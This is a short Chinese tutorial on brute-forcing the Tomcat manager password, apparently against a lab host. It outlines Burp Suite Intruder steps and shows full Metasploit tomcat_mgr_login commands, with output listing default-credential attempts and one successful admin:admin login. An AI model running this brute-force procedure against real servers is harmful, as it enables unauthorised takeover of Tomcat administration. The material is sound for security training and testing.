burpsuite爆破tomcat管理密码
- 浏览器访问tomcat管理界面,使用burpsuite截断,并输入密码,basic编码后的密码为(admin:admin)
- 将截断的请求发送到intruder中,并对密码字段添加变量标注:
- 设置payload字段
- 设置payload编码方式为base64,同时去掉payload的正则匹配
- burp爆破成功
msf爆破tomcat管理密码(推荐方式)
msf5 > use auxiliary/scanner/http/tomcat_mgr_login
msf5 auxiliary(scanner/http/tomcat_mgr_login) > set rhosts 192.168.57.200
rhosts => 192.168.57.200
msf5 auxiliary(scanner/http/tomcat_mgr_login) > set USER_FILE use.txt
USER_FILE => use.txt
msf5 auxiliary(scanner/http/tomcat_mgr_login) > set PASS_FILE pa.txt
PASS_FILE => pa.txt
msf5 auxiliary(scanner/http/tomcat_mgr_login) > show actions
Auxiliary actions:
Name Description
---- -----------
msf5 auxiliary(scanner/http/tomcat_mgr_login) > exploit
[!] No active DB -- Credential data will not be saved!
[-] 192.168.57.200:8080 - LOGIN FAILED: admin:adb fbd (Incorrect)
[-] 192.168.57.200:8080 - LOGIN FAILED: admin:12345 (Incorrect)
[+] 192.168.57.200:8080 - Login Successful: admin:admin
[-] 192.168.57.200:8080 - LOGIN FAILED: 123456:adb fbd (Incorrect)
[-] 192.168.57.200:8080 - LOGIN FAILED: 123456:12345 (Incorrect)
[-] 192.168.57.200:8080 - LOGIN FAILED: 123456:admin (Incorrect)
[-] 192.168.57.200:8080 - LOGIN FAILED: :adb fbd (Incorrect)
[-] 192.168.57.200:8080 - LOGIN FAILED: :12345 (Incorrect)
[-] 192.168.57.200:8080 - LOGIN FAILED: :admin (Incorrect)
[-] 192.168.57.200:8080 - LOGIN FAILED: j2deployer:j2deployer (Incorrect)
[-] 192.168.57.200:8080 - LOGIN FAILED: ovwebusr:OvW*busr1 (Incorrect)
[-] 192.168.57.200:8080 - LOGIN FAILED: cxsdk:kdsxc (Incorrect)
[-] 192.168.57.200:8080 - LOGIN FAILED: root:owaspbwa (Incorrect)
[-] 192.168.57.200:8080 - LOGIN FAILED: ADMIN:ADMIN (Incorrect)
[-] 192.168.57.200:8080 - LOGIN FAILED: xampp:xampp (Incorrect)
[-] 192.168.57.200:8080 - LOGIN FAILED: tomcat:s3cret (Incorrect)
[-] 192.168.57.200:8080 - LOGIN FAILED: QCC:QLogic66 (Incorrect)
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed